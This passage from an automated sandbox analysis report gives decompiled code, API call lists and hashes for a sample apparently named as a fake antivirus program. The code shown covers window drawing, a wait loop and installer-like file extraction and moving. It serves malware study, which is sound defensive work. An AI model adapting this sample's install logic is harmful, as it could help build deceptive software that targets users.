                                                                                                                                                      									DeleteObject(_t39);
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						_t15 = GetWindow(_t35, 2);
                                                                                                                                                      						_t35 = _t15;
                                                                                                                                                      						if(_t35 != _v8) {
                                                                                                                                                      							_a4 =  &(_a4->i);
                                                                                                                                                      							if(_t35 != 0) {
                                                                                                                                                      								continue;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					goto L12;
                                                                                                                                                      				}
                                                                                                                                                      			}














                                                                                                                                                      0x0040ba3f
                                                                                                                                                      0x0040ba46
                                                                                                                                                      0x0040bb26
                                                                                                                                                      0x0040bb26
                                                                                                                                                      0x0040ba52
                                                                                                                                                      0x0040ba58
                                                                                                                                                      0x0040ba5c
                                                                                                                                                      0x0040ba5e
                                                                                                                                                      0x0040ba63
                                                                                                                                                      0x0040bb24
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040ba69
                                                                                                                                                      0x0040ba71
                                                                                                                                                      0x0040ba8b
                                                                                                                                                      0x0040baa4
                                                                                                                                                      0x0040bac2
                                                                                                                                                      0x0040bac6
                                                                                                                                                      0x0040bacf
                                                                                                                                                      0x0040bad8
                                                                                                                                                      0x0040baf6
                                                                                                                                                      0x0040baf8
                                                                                                                                                      0x0040bafe
                                                                                                                                                      0x0040bb01
                                                                                                                                                      0x0040bb01
                                                                                                                                                      0x0040bafe
                                                                                                                                                      0x0040bac6
                                                                                                                                                      0x0040bb0a
                                                                                                                                                      0x0040bb10
                                                                                                                                                      0x0040bb15
                                                                                                                                                      0x0040bb17
                                                                                                                                                      0x0040bb1c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bb1c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bb15
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bb23

                                                                                                                                                      APIs
                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 0040BA52
                                                                                                                                                      • GetClassNameA.USER32(00000000,?,00000400), ref: 0040BA8B
                                                                                                                                                        • Part of subcall function 0040DA54: CompareStringA.KERNEL32(00000400,00001001,0040BAA2,000000FF,?,000000FF,0040BAA2,?,STATIC), ref: 0040DA6A
                                                                                                                                                      • GetWindowLongA.USER32 ref: 0040BAA9
                                                                                                                                                      • SendMessageA.USER32 ref: 0040BAC0
                                                                                                                                                      • GetObjectA.GDI32(00000000,00000018,?), ref: 0040BACF
                                                                                                                                                        • Part of subcall function 0040ACE4: GetDC.USER32(00000000), ref: 0040ACF0
                                                                                                                                                        • Part of subcall function 0040ACE4: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0040ACFF
                                                                                                                                                        • Part of subcall function 0040ACE4: ReleaseDC.USER32 ref: 0040AD0D
                                                                                                                                                        • Part of subcall function 0040ACA1: GetDC.USER32(00000000), ref: 0040ACAD
                                                                                                                                                        • Part of subcall function 0040ACA1: GetDeviceCaps.GDI32(00000000,00000058), ref: 0040ACBC
                                                                                                                                                        • Part of subcall function 0040ACA1: ReleaseDC.USER32 ref: 0040ACCA
                                                                                                                                                        • Part of subcall function 0040ABDC: GetDC.USER32(00000000), ref: 0040ABE8
                                                                                                                                                        • Part of subcall function 0040ABDC: CreateCompatibleDC.GDI32(00000000), ref: 0040ABF8
                                                                                                                                                        • Part of subcall function 0040ABDC: CreateCompatibleDC.GDI32(?), ref: 0040ABFF
                                                                                                                                                        • Part of subcall function 0040ABDC: GetObjectA.GDI32(?,00000018,?), ref: 0040AC0D
                                                                                                                                                        • Part of subcall function 0040ABDC: CreateCompatibleBitmap.GDI32(?,00000000,?), ref: 0040AC2F
                                                                                                                                                        • Part of subcall function 0040ABDC: SelectObject.GDI32(00000000,?), ref: 0040AC42
                                                                                                                                                        • Part of subcall function 0040ABDC: SelectObject.GDI32(?,00000000), ref: 0040AC4D
                                                                                                                                                        • Part of subcall function 0040ABDC: StretchBlt.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0040AC6B
                                                                                                                                                        • Part of subcall function 0040ABDC: SelectObject.GDI32(00000000,?), ref: 0040AC75
                                                                                                                                                        • Part of subcall function 0040ABDC: SelectObject.GDI32(?,?), ref: 0040AC7D
                                                                                                                                                        • Part of subcall function 0040ABDC: DeleteDC.GDI32(00000000), ref: 0040AC86
                                                                                                                                                        • Part of subcall function 0040ABDC: DeleteDC.GDI32(?), ref: 0040AC8B
                                                                                                                                                        • Part of subcall function 0040ABDC: ReleaseDC.USER32 ref: 0040AC91
                                                                                                                                                      • SendMessageA.USER32 ref: 0040BAF6
                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0040BB01
                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 0040BB0A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Object$Select$CompatibleCreateDeleteReleaseWindow$CapsDeviceMessageSend$BitmapClassCompareLongNameStretchString
                                                                                                                                                      • String ID: STATIC
                                                                                                                                                      • API String ID: 1367540300-1882779555
                                                                                                                                                      • Opcode ID: 677bcef28c02b9025152f1654d38757b0e1f9e66b029602011c5aca648503118
                                                                                                                                                      • Instruction ID: 07f9587c200ef160eeb3ad195d6a3061ef833dedfa1007c32b69e14aeef2bfc0
                                                                                                                                                      • Opcode Fuzzy Hash: 677bcef28c02b9025152f1654d38757b0e1f9e66b029602011c5aca648503118
                                                                                                                                                      • Instruction Fuzzy Hash: 4521AF32540604BBDB11AB60CD86FFF7A78EB45704F108136FA00B61D5DB78A952D6AD
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                      			E004066B3(intOrPtr __ecx) {
                                                                                                                                                      				long _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				char _v16;
                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                      				short _v32;
                                                                                                                                                      				struct tagMSG _v60;
                                                                                                                                                      				void* _t23;
                                                                                                                                                      				intOrPtr* _t25;
                                                                                                                                                      				short _t28;
                                                                                                                                                      				intOrPtr* _t30;
                                                                                                                                                      
                                                                                                                                                      				_v12 = __ecx;
                                                                                                                                                      				_v8 = GetTickCount();
                                                                                                                                                      				_t23 = GetTickCount() - _v8;
                                                                                                                                                      				while(_t23 <= 0x2710) {
                                                                                                                                                      					_t25 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                                                      					 *((intOrPtr*)( *_t25 + 0xe0))(_t25,  &_v16);
                                                                                                                                                      					if(_v16 != 4) {
                                                                                                                                                      						if(PeekMessageA( &_v60, 0, 0, 0, 0) != 0) {
                                                                                                                                                      							TranslateMessage( &_v60);
                                                                                                                                                      							DispatchMessageA( &_v60);
                                                                                                                                                      							GetMessageA( &_v60, 0, 0, 0);
                                                                                                                                                      						}
                                                                                                                                                      						_t23 = GetTickCount() - _v8;
                                                                                                                                                      						continue;
                                                                                                                                                      					}
                                                                                                                                                      					break;
                                                                                                                                                      				}
                                                                                                                                                      				__imp__#8( &_v32);
                                                                                                                                                      				_t28 = 3;
                                                                                                                                                      				_v32 = _t28;
                                                                                                                                                      				_t30 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                                                      				_v24 = 0x96;
                                                                                                                                                      				return  *((intOrPtr*)( *_t30 + 0xd8))(_t30, 0x3f, 2,  &_v32, 0);
                                                                                                                                                      			}













                                                                                                                                                      0x004066c2
                                                                                                                                                      0x004066c7
                                                                                                                                                      0x004066cc
                                                                                                                                                      0x00406729
                                                                                                                                                      0x004066db
                                                                                                                                                      0x004066e5
                                                                                                                                                      0x004066ef
                                                                                                                                                      0x00406701
                                                                                                                                                      0x00406707
                                                                                                                                                      0x00406711
                                                                                                                                                      0x0040671e
                                                                                                                                                      0x0040671e
                                                                                                                                                      0x00406726
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406726
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004066ef
                                                                                                                                                      0x00406731
                                                                                                                                                      0x00406739
                                                                                                                                                      0x0040673f
                                                                                                                                                      0x00406746
                                                                                                                                                      0x0040674d
                                                                                                                                                      0x00406761

                                                                                                                                                      APIs
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004066C5
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004066CA
                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004066F9
                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00406707
                                                                                                                                                      • DispatchMessageA.USER32 ref: 00406711
                                                                                                                                                      • GetMessageA.USER32 ref: 0040671E
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00406724
                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00406731
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Message$CountTick$DispatchInitPeekTranslateVariant
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4242828014-0
                                                                                                                                                      • Opcode ID: 766a9df9442bdbeba9f0a7bc8735e7438eb22f29082fd7e0e4a68b4f8cac5761
                                                                                                                                                      • Instruction ID: c0585beae235016d48584d35ef6264e879dc9a629979c78930dffb86ffc294e5
                                                                                                                                                      • Opcode Fuzzy Hash: 766a9df9442bdbeba9f0a7bc8735e7438eb22f29082fd7e0e4a68b4f8cac5761
                                                                                                                                                      • Instruction Fuzzy Hash: 2521F7B1D00209AFDB00DBE4D988DEEBBBCEF48354F148866F106E7250D7789A45CB60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E0040C5B9(void* __edi, void* __esi) {
                                                                                                                                                      				intOrPtr _t231;
                                                                                                                                                      				void* _t232;
                                                                                                                                                      				void* _t307;
                                                                                                                                                      				void* _t309;
                                                                                                                                                      
                                                                                                                                                      				L0:
                                                                                                                                                      				while(1) {
                                                                                                                                                      					L0:
                                                                                                                                                      					_t307 = __esi;
                                                                                                                                                      					if( *((intOrPtr*)(_t309 + 0x10)) != 1) {
                                                                                                                                                      						goto L103;
                                                                                                                                                      					}
                                                                                                                                                      					L88:
                                                                                                                                                      					__ebp - 0xc34 = GetTempPathA(0x400, __ebp - 0xc34);
                                                                                                                                                      					__ebp - 0xc34 = E004076C8(__ebp - 0xc34);
                                                                                                                                                      					 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
                                                                                                                                                      					_push(0);
                                                                                                                                                      					__ebx = "%s%s%d";
                                                                                                                                                      					while(1) {
                                                                                                                                                      						L90:
                                                                                                                                                      						__eax = __ebp - 0xc34;
                                                                                                                                                      						__eax = __ebp - 0x834;
                                                                                                                                                      						__eax =  *__edi(__ebp - 0x834, __ebx, __ebp - 0xc34,  *0x41409c);
                                                                                                                                                      						__esp = __esp + 0x14;
                                                                                                                                                      						__eax = __ebp - 0x834;
                                                                                                                                                      						__eax = __esi->i(__ebp - 0x834);
                                                                                                                                                      						if(__eax == 0xffffffff) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						L89:
                                                                                                                                                      						_t127 = __ebp - 4;
                                                                                                                                                      						 *_t127 =  *(__ebp - 4) + 1;
                                                                                                                                                      						_push( *(__ebp - 4));
                                                                                                                                                      					}
                                                                                                                                                      					L91:
                                                                                                                                                      					__ebp - 0x834 = SetDlgItemTextA( *(__ebp + 8), 0x65, __ebp - 0x834);
                                                                                                                                                      					if( *(__ebp - 0x1c34) == 0) {
                                                                                                                                                      						while(1) {
                                                                                                                                                      							L152:
                                                                                                                                                      							_t231 = E0040B613(0x1000, _t307,  *((intOrPtr*)(_t309 + 0xc)), _t309 - 0x54dc, _t309 - 0x1c34, _t309 - 5, _t309 + 0xf);
                                                                                                                                                      							 *((intOrPtr*)(_t309 + 0xc)) = _t231;
                                                                                                                                                      							if(_t231 != 0) {
                                                                                                                                                      								_t307 = GetFileAttributesA;
                                                                                                                                                      								_t232 = _t309 - 0x1c34;
                                                                                                                                                      								 *(_t309 - 4) = _t309 - 0xb4dc;
                                                                                                                                                      								 *((intOrPtr*)(_t309 - 0xc)) = 6;
                                                                                                                                                      								goto L2;
                                                                                                                                                      							} else {
                                                                                                                                                      								break;
                                                                                                                                                      							}
                                                                                                                                                      							L4:
                                                                                                                                                      							while(lstrcmpiA(_t309 - 0x54dc,  *(0x4140b8 +  *(_t309 - 4) * 4)) != 0) {
                                                                                                                                                      								 *(_t309 - 4) =  *(_t309 - 4) + 1;
                                                                                                                                                      								if( *(_t309 - 4) < 0xd) {
                                                                                                                                                      									continue;
                                                                                                                                                      								} else {
                                                                                                                                                      									goto L152;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							if( *(_t309 - 4) > 0xc) {
                                                                                                                                                      								continue;
                                                                                                                                                      							}
                                                                                                                                                      							L8:
                                                                                                                                                      							switch( *((intOrPtr*)( *(_t309 - 4) * 4 +  &M0040CA61))) {
                                                                                                                                                      								case 0:
                                                                                                                                                      									L9:
                                                                                                                                                      									__eflags =  *((intOrPtr*)(_t309 + 0x10)) - 2;
                                                                                                                                                      									if( *((intOrPtr*)(_t309 + 0x10)) != 2) {
                                                                                                                                                      										goto L152;
                                                                                                                                                      									}
                                                                                                                                                      									L10:
                                                                                                                                                      									GetCurrentDirectoryA(0x400, _t309 - 0x434);
                                                                                                                                                      									E0040A477(_t309 - 0xc34, _t309 - 0x434);
                                                                                                                                                      									E004076C8(_t309 - 0xc34);
                                                                                                                                                      									E0040A5E2(_t309 - 0xc34, _t309 - 0x1c34);
                                                                                                                                                      									E00405BAD(_t309 - 0x40dc);
                                                                                                                                                      									E00405BDD(_t309 - 0x40dc, _t309 - 0xc34);
                                                                                                                                                      									E00403556(_t309 - 0x30d4);
                                                                                                                                                      									_push(0);
                                                                                                                                                      									_t300 = _t309 - 0x40dc;
                                                                                                                                                      									_t252 = E00405FAD(_t309 - 0x40dc, _t302, _t309 - 0x30d4);
                                                                                                                                                      									__eflags = _t252;
                                                                                                                                                      									if(_t252 == 0) {
                                                                                                                                                      										L27:
                                                                                                                                                      										E00405BCA(_t309 - 0x40dc);
                                                                                                                                                      										goto L152;
                                                                                                                                                      									} else {
                                                                                                                                                      										_t295 = "%s.%d.tmp";
                                                                                                                                                      										do {
                                                                                                                                                      											L12:
                                                                                                                                                      											SetFileAttributesA(_t309 - 0x30d4, 0);
                                                                                                                                                      											__eflags =  *((char*)(_t309 - 0x24c4));
                                                                                                                                                      											if( *((char*)(_t309 - 0x24c4)) == 0) {
                                                                                                                                                      												L18:
                                                                                                                                                      												_t257 = GetFileAttributesA(_t309 - 0x30d4);
                                                                                                                                                      												__eflags = _t257 - 0xffffffff;
                                                                                                                                                      												if(_t257 == 0xffffffff) {
                                                                                                                                                      													goto L26;
                                                                                                                                                      												}
                                                                                                                                                      												L19:
                                                                                                                                                      												_t261 = DeleteFileA(_t309 - 0x30d4);
                                                                                                                                                      												__eflags = _t261;
                                                                                                                                                      												if(_t261 != 0) {
                                                                                                                                                      													goto L26;
                                                                                                                                                      												} else {
                                                                                                                                                      													 *(_t309 - 4) =  *(_t309 - 4) & _t261;
                                                                                                                                                      													_push(_t261);
                                                                                                                                                      													goto L22;
                                                                                                                                                      													L22:
                                                                                                                                                      													wsprintfA(_t309 - 0x834, _t295, _t309 - 0x30d4);
                                                                                                                                                      													_t311 = _t311 + 0x10;
                                                                                                                                                      													_t266 = GetFileAttributesA(_t309 - 0x834);
                                                                                                                                                      													__eflags = _t266 - 0xffffffff;
                                                                                                                                                      													if(_t266 != 0xffffffff) {
                                                                                                                                                      														_t60 = _t309 - 4;
                                                                                                                                                      														 *_t60 =  *(_t309 - 4) + 1;
                                                                                                                                                      														__eflags =  *_t60;
                                                                                                                                                      														_push( *(_t309 - 4));
                                                                                                                                                      														goto L22;
                                                                                                                                                      													} else {
                                                                                                                                                      														_t269 = MoveFileA(_t309 - 0x30d4, _t309 - 0x834);
                                                                                                                                                      														__eflags = _t269;
                                                                                                                                                      														if(_t269 != 0) {
                                                                                                                                                      															_t270 = E00406EA5();
                                                                                                                                                      															__eflags = _t270;
                                                                                                                                                      															if(_t270 != 0) {
                                                                                                                                                      																MoveFileExA(_t309 - 0x834, 0, 4);
                                                                                                                                                      															}
                                                                                                                                                      														}
                                                                                                                                                      														goto L26;
                                                                                                                                                      													}
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      											L13:
                                                                                                                                                      											__eflags = E00406EA5() - 4;
                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                      												goto L18;
                                                                                                                                                      											}
                                                                                                                                                      											L14:
                                                                                                                                                      											E00407300(_t300, __eflags, _t309 - 0x434, _t309 - 0x2034);
                                                                                                                                                      											E004076C8(_t309 - 0x2034);
                                                                                                                                                      											_t280 = E0040A384(_t300, _t309 - 0x434);
                                                                                                                                                      											 *((intOrPtr*)(_t309 - 0xc)) = _t280;
                                                                                                                                                      											__eflags = _t280 - 4;
                                                                                                                                                      											if(_t280 < 4) {
                                                                                                                                                      												L16:
                                                                                                                                                      												_t282 = E00407279(_t300, _t309 - 0x1c34, 0);
                                                                                                                                                      												__eflags = _t282;
                                                                                                                                                      												if(_t282 != 0) {
                                                                                                                                                      													goto L27;
                                                                                                                                                      												}
                                                                                                                                                      												L17:
                                                                                                                                                      												 *((char*)(_t309 + E0040A384(_t300, _t309 - 0x30d4) - 0x30d3)) = 0;
                                                                                                                                                      												E0040A289(_t300, _t309 - 0x34, 0, 0x1e);
                                                                                                                                                      												_push(0x14);
                                                                                                                                                      												_pop(_t287);
                                                                                                                                                      												 *((short*)(_t309 - 0x24)) = _t287;
                                                                                                                                                      												 *((intOrPtr*)(_t309 - 0x2c)) = _t309 - 0x30d4;
                                                                                                                                                      												 *((intOrPtr*)(_t309 - 0x30)) = 3;
                                                                                                                                                      												SHFileOperationA(_t309 - 0x34);
                                                                                                                                                      												goto L18;
                                                                                                                                                      											}
                                                                                                                                                      											L15:
                                                                                                                                                      											_t292 = E0040A384(_t300, _t309 - 0x2034);
                                                                                                                                                      											__eflags =  *((intOrPtr*)(_t309 - 0xc)) - _t292;
                                                                                                                                                      											if( *((intOrPtr*)(_t309 - 0xc)) > _t292) {
                                                                                                                                                      												goto L17;
                                                                                                                                                      											}
                                                                                                                                                      											goto L16;
                                                                                                                                                      											L26:
                                                                                                                                                      											_push(0);
                                                                                                                                                      											_t300 = _t309 - 0x40dc;
                                                                                                                                                      											_t259 = E00405FAD(_t309 - 0x40dc, _t302, _t309 - 0x30d4);
                                                                                                                                                      											__eflags = _t259;
                                                                                                                                                      										} while (_t259 != 0);
                                                                                                                                                      										goto L27;
                                                                                                                                                      									}
                                                                                                                                                      								case 1:
                                                                                                                                                      									L28:
                                                                                                                                                      									__eflags =  *(__ebp + 0x10);
                                                                                                                                                      									if( *(__ebp + 0x10) == 0) {
                                                                                                                                                      										__eax =  *0x41a81c;
                                                                                                                                                      										__eflags =  *0x41a81c;
                                                                                                                                                      										__ebx = __ebx & 0xffffff00 |  *0x41a81c == 0x00000000;
                                                                                                                                                      										__eflags = __bl;
                                                                                                                                                      										if(__bl == 0) {
                                                                                                                                                      											__eax = E0040A5E2(__eax, "<br>");
                                                                                                                                                      										}
                                                                                                                                                      										L31:
                                                                                                                                                      										__eflags =  *((char*)(__ebp - 5));
                                                                                                                                                      										if(__eflags == 0) {
                                                                                                                                                      											__esi = __ebp + 0xc;
                                                                                                                                                      											__edi = E0040B7BA(__ebp + 0xc, __eflags);
                                                                                                                                                      										} else {
                                                                                                                                                      											__edi = __ebp - 0x1c34;
                                                                                                                                                      										}
                                                                                                                                                      										__eflags = __bl;
                                                                                                                                                      										if(__bl == 0) {
                                                                                                                                                      											__esi = E0040A384(__ecx,  *0x41a81c);
                                                                                                                                                      										} else {
                                                                                                                                                      											__esi = 0;
                                                                                                                                                      										}
                                                                                                                                                      										E0040A384(__ecx, __edi) = __eax + __esi + 5;
                                                                                                                                                      										__eax = E0040A224( *0x41a81c, __eax);
                                                                                                                                                      										 *0x41a81c = __eax;
                                                                                                                                                      										__eflags = __bl;
                                                                                                                                                      										if(__bl != 0) {
                                                                                                                                                      											 *__eax = 0;
                                                                                                                                                      										}
                                                                                                                                                      										L39:
                                                                                                                                                      										__eax = E0040A5E2(__eax, __edi);
                                                                                                                                                      										__eflags =  *((char*)(__ebp - 5));
                                                                                                                                                      										if( *((char*)(__ebp - 5)) == 0) {
                                                                                                                                                      											__eax = E0040A205(__edi);
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      									goto L152;
                                                                                                                                                      								case 2:
                                                                                                                                                      									L41:
                                                                                                                                                      									__eflags =  *(__ebp + 0x10);
                                                                                                                                                      									if( *(__ebp + 0x10) == 0) {
                                                                                                                                                      										__ebp - 0x1c34 = SetWindowTextA( *(__ebp + 8), __ebp - 0x1c34); // executed
                                                                                                                                                      									}
                                                                                                                                                      									goto L152;
                                                                                                                                                      								case 3:
                                                                                                                                                      									L43:
                                                                                                                                                      									__eflags =  *(__ebp + 0x10);
                                                                                                                                                      									if( *(__ebp + 0x10) != 0) {
                                                                                                                                                      										goto L152;
                                                                                                                                                      									}
                                                                                                                                                      									L44:
                                                                                                                                                      									__eflags =  *0x419f92;
                                                                                                                                                      									if( *0x419f92 != 0) {
                                                                                                                                                      										goto L152;
                                                                                                                                                      									}
                                                                                                                                                      									L45:
                                                                                                                                                      									__eflags =  *(__ebp - 0x1c34) - 0x22;
                                                                                                                                                      									__esi = __ebp - 0x1c34;
                                                                                                                                                      									 *(__ebp - 0x434) = 0;
                                                                                                                                                      									if( *(__ebp - 0x1c34) == 0x22) {
                                                                                                                                                      										__esi = __ebp - 0x1c33;
                                                                                                                                                      									}
                                                                                                                                                      									__eax = E0040A384(__ecx, __esi);
                                                                                                                                                      									__eflags = __eax - 0x400;
                                                                                                                                                      									if(__eax >= 0x400) {
                                                                                                                                                      										goto L152;
                                                                                                                                                      									} else {
                                                                                                                                                      										L48:
                                                                                                                                                      										__al = __esi->i;
                                                                                                                                                      										__eflags = __al - 0x2e;
                                                                                                                                                      										if(__al != 0x2e) {
                                                                                                                                                      											L57:
                                                                                                                                                      											__eflags = __al - 0x5c;
                                                                                                                                                      											if(__al == 0x5c) {
                                                                                                                                                      												L51:
                                                                                                                                                      												__ebp - 0x434 = E0040A477(__ebp - 0x434, __esi);
                                                                                                                                                      												L52:
                                                                                                                                                      												__eax = __ebp - 0x434;
                                                                                                                                                      												__eax = E0040A3D9(__ecx, __ebp - 0x434, 0x22);
                                                                                                                                                      												__eflags = __eax;
                                                                                                                                                      												if(__eax != 0) {
                                                                                                                                                      													__eflags =  *((char*)(__eax + 1));
                                                                                                                                                      													if( *((char*)(__eax + 1)) == 0) {
                                                                                                                                                      														 *__eax = 0;
                                                                                                                                                      													}
                                                                                                                                                      												}
                                                                                                                                                      												__ebp - 0x434 = E0040A477(__ebx, __ebp - 0x434);
                                                                                                                                                      												__ebp - 0x434 = E0040B9B0(__esi, __ebp - 0x434); // executed
                                                                                                                                                      												__esi = GetDlgItem( *(__ebp + 8), 0x65);
                                                                                                                                                      												__ebp - 0x434 = SetWindowTextA(__esi, __ebp - 0x434); // executed
                                                                                                                                                      												__eax = SendMessageA(__esi, 0x143, 0, __ebx); // executed
                                                                                                                                                      												__eax = __ebp - 0x434;
                                                                                                                                                      												__eax = E0040A4E9(__ebx, __ebp - 0x434);
                                                                                                                                                      												__eflags = __eax;
                                                                                                                                                      												if(__eax != 0) {
                                                                                                                                                      													__ebp - 0x434 = SendMessageA(__esi, 0x143, 0, __ebp - 0x434);
                                                                                                                                                      												}
                                                                                                                                                      												goto L152;
                                                                                                                                                      											}
                                                                                                                                                      											L58:
                                                                                                                                                      											__eflags = __al;
                                                                                                                                                      											if(__al == 0) {
                                                                                                                                                      												L60:
                                                                                                                                                      												__eax = __ebp - 0x10;
                                                                                                                                                      												__eax = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1, __ebp - 0x10);
                                                                                                                                                      												__eflags = __eax;
                                                                                                                                                      												if(__eax == 0) {
                                                                                                                                                      													__ebp - 0xc = __ebp - 0x434;
                                                                                                                                                      													__eax = __ebp - 0x14;
                                                                                                                                                      													 *(__ebp - 0xc) = 0x400;
                                                                                                                                                      													RegQueryValueExA( *(__ebp - 0x10), "ProgramFilesDir", 0, __ebp - 0x14, __ebp - 0x434, __ebp - 0xc) = RegCloseKey( *(__ebp - 0x10));
                                                                                                                                                      												}
                                                                                                                                                      												__eflags =  *(__ebp - 0x434);
                                                                                                                                                      												if( *(__ebp - 0x434) != 0) {
                                                                                                                                                      													__eax = __ebp - 0x434;
                                                                                                                                                      													__eax = E0040A384(__ecx, __ebp - 0x434);
                                                                                                                                                      													__ecx = __ebp - 0x434;
                                                                                                                                                      													__ecx = __ebp - 0x433;
                                                                                                                                                      													__eflags =  *((char*)(__eax + __ecx)) - 0x5c;
                                                                                                                                                      													if( *((char*)(__eax + __ecx)) != 0x5c) {
                                                                                                                                                      														__ebp - 0x434 = E0040A5E2(__ebp - 0x434, "\\");
                                                                                                                                                      													}
                                                                                                                                                      												}
                                                                                                                                                      												__edi = E0040A384(__ecx, __esi);
                                                                                                                                                      												__eax = __ebp - 0x434;
                                                                                                                                                      												__edi = __edi + E0040A384(__ecx, __ebp - 0x434);
                                                                                                                                                      												__eflags = __edi - 0x3ff;
                                                                                                                                                      												if(__edi < 0x3ff) {
                                                                                                                                                      													__ebp - 0x434 = E0040A5E2(__ebp - 0x434, __esi);
                                                                                                                                                      												}
                                                                                                                                                      												goto L52;
                                                                                                                                                      											}
                                                                                                                                                      											L59:
                                                                                                                                                      											__eflags = __esi->i - 0x3a;
                                                                                                                                                      											if(__esi->i == 0x3a) {
                                                                                                                                                      												goto L51;
                                                                                                                                                      											}
                                                                                                                                                      											goto L60;
                                                                                                                                                      										}
                                                                                                                                                      										L49:
                                                                                                                                                      										__eflags = __esi->i - 0x5c;
                                                                                                                                                      										if(__esi->i != 0x5c) {
                                                                                                                                                      											goto L57;
                                                                                                                                                      										}
                                                                                                                                                      										L50:
                                                                                                                                                      										__esi =  &(__esi->i);
                                                                                                                                                      										__eflags = __esi;
                                                                                                                                                      										goto L51;
                                                                                                                                                      									}
                                                                                                                                                      								case 4:
                                                                                                                                                      									L67:
                                                                                                                                                      									__eflags =  *0x419f8c - 1;
                                                                                                                                                      									__eflags = __eax - 0x419f8c;
                                                                                                                                                      									 *__edi =  *__edi + __ecx;
                                                                                                                                                      									__eflags =  *(__ebp + 5) & __cl;
                                                                                                                                                      									 *__eax =  *__eax + __al;
                                                                                                                                                      									__eflags =  *__eax;
                                                                                                                                                      								case 5:
                                                                                                                                                      									L72:
                                                                                                                                                      									__eax =  *(__ebp - 0x1c34);
                                                                                                                                                      									__eax =  *(__ebp - 0x1c34);
                                                                                                                                                      									__eflags = __eax;
                                                                                                                                                      									if(__eax == 0) {
                                                                                                                                                      										L79:
                                                                                                                                                      										 *0x419edf = 0;
                                                                                                                                                      										 *0x419ede = 1;
                                                                                                                                                      										goto L152;
                                                                                                                                                      									}
                                                                                                                                                      									L73:
                                                                                                                                                      									__eax = __eax - 0x30;
                                                                                                                                                      									__eflags = __eax;
                                                                                                                                                      									if(__eax == 0) {
                                                                                                                                                      										L77:
                                                                                                                                                      										 *0x419edf = 0;
                                                                                                                                                      										L78:
                                                                                                                                                      										 *0x419ede = 0;
                                                                                                                                                      										goto L152;
                                                                                                                                                      									}
                                                                                                                                                      									L74:
                                                                                                                                                      									__eax = __eax - 1;
                                                                                                                                                      									__eflags = __eax;
                                                                                                                                                      									if(__eax == 0) {
                                                                                                                                                      										goto L79;
                                                                                                                                                      									}
                                                                                                                                                      									L75:
